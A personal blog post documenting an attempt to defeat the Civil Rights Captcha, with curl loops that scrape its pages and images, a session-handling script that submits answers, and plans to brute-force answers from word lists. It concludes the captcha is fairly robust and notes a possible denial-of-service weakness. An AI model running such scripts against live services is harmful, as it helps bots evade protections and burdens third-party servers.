Warning - nerdy content I spent a lazy afternoon back in Dublin pulling apart Civil rights captcha, and I wanted to save my notes by sticking them on the blog.
Civil rights captcha is a system that aims to educate people on civil rights as well as tell humans from robots.
Note that wired and therefore hacker news talk about filtering out internet idiots with this, which isn't mentioned on their site.
First idea - they only have a few questions. I think each question takes a human to come up with it and review it.They can't really raise civil rights awareness with a incorrect collection of ills and they don't want to be sued for libel.
Download the page 1000 times.
for x in {0..1000}; do curl -s -o dataset/$x captcha.civilrightsdefenders.org done
Compare them to one another.
for x in dataset/*; do diff dataset/0 $x | egrep '>' done | sort | uniq > questions
They have given 8 questions. Theories as to why:
They might also have many correct answers per question. With a normal captcha you only have one correct answer.
How many answers are there? Use chrome to grab a image url. Use curl to hit that url a few times. Each file has a different sha1sum (it would be nice to have a command line tool that uses a cheaper hash), so possibly a bug in the loop or a different image. Download 1000 images.
mkdir images for x in {0..10000}; do curl -s -o images/$x 'http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=xJZNm2G1mK5TQQH69mX3&newset=7&lang=en'; done
Hash all the images, see 1003 different hashes. Ideas:
Look at the images. Lots of different words, some negative, some positive. Some dupe words, but not many. Download 6k images. All of them are different.
Peer at chrome's debugger. Watch the process. The javascript fetches one image with newset=1, and two more without the newset parameter. Each request has a sid parameter set to a random string. The random string is different for each image. The newset request sets a cookie, which is sent back to the server. Example cookie:
Set-Cookie: PHPSESSID=eq0llt1rjtfr0h3fa0mlorrm67; path=/
Random string notes: its not clear what purpose the random string serves. If I had to guess, it prevents http caching.
Once the user enters a answer, it does validation with a request like so.
curl --cookie 'PHPSESSID=e66bfeidg9ukm1ovvk9cn1i8f6' 'http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=concerned'result:
jQuery1({"answer":"false"});
So it presumably stores a map of session to correct answer on the server side, and returns a json blob if the user's input is correct.
Code for a session
set -eux session_id=$RANDOM dir=session-$session_id mkdir $dir random=$(printf "%06daaaaaaaaaaaaaa" $session_id) curl -s -o $dir/1.png --dump-header $dir/1.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${random}&newset=1&lang cookie=$(awk '/Set-Cookie:/{print $2}' session/1.headers | tr -d ';') awk '/Set-Cookie:/{print $2}' $dir/1.headers curl --cookie "$cookie" -s -o $dir/2.png --dump-header $dir/2.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${ra curl --cookie "$cookie" -s -o $dir/3.png --dump-header $dir/3.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${ra echo $dir echo 'work out the answer' read answer curl -s --dump-header $dir/answer.headers --cookie "$cookie" "http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=${answer}"
Start out by sending the contents of /usr/share/dict/british-english
% wc -l /usr/share/dict/british-english 99156 /usr/share/dict/british-english
It takes 30s to test 100 words. So to test british-english would take 8 hours. New plan: find a list of words for emotions on the internet. like so.
Even though the key space is quite small, O(100)s of words, brute forcing is hard because any false answer drops the session.
This is more robust than I expected. A lot of the attacks I expected to work don't work. There are fairly few questions, but the questions don't matter. There are O(100s) of text answers, but its generating a new image for each request, meaning that there isn't any point in solving the images offline (or spending time trying to use their site as a oracle for the images). It reduces down to the normal image captcha problem - OCRing images online. Its also probably vulnerable to dos attacks on opening many sessions.
Post-script: actually reading their docs shows that its based on php captcha.
The rest of the blog